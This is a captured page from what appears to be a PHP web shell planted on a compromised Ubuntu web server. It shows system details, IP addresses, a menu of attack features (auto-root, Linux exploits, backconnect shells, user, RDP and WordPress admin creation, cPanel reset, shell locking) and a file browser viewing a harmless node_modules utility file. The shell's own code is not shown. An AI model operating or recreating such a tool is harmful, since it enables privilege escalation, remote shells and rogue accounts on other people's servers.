Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
file-loader /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
cjs.js
116
B
-rw-rw-rw-
index.js
2.5
KB
-rw-rw-rw-
options.json
1.96
KB
-rw-rw-rw-
utils.js
1.05
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : utils.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.normalizePath = normalizePath; function normalizePath(path, stripTrailing) { if (path === '\\' || path === '/') { return '/'; } const len = path.length; if (len <= 1) { return path; } // ensure that win32 namespaces has two leading slashes, so that the path is // handled properly by the win32 version of path.parse() after being normalized // https://msdn.microsoft.com/library/windows/desktop/aa365247(v=vs.85).aspx#namespaces let prefix = ''; if (len > 4 && path[3] === '\\') { // eslint-disable-next-line prefer-destructuring const ch = path[2]; if ((ch === '?' || ch === '.') && path.slice(0, 2) === '\\\\') { // eslint-disable-next-line no-param-reassign path = path.slice(2); prefix = '//'; } } const segs = path.split(/[/\\]+/); if (stripTrailing !== false && segs[segs.length - 1] === '') { segs.pop(); } return prefix + segs.join('/'); } // eslint-disable-next-line import/prefer-default-export
Close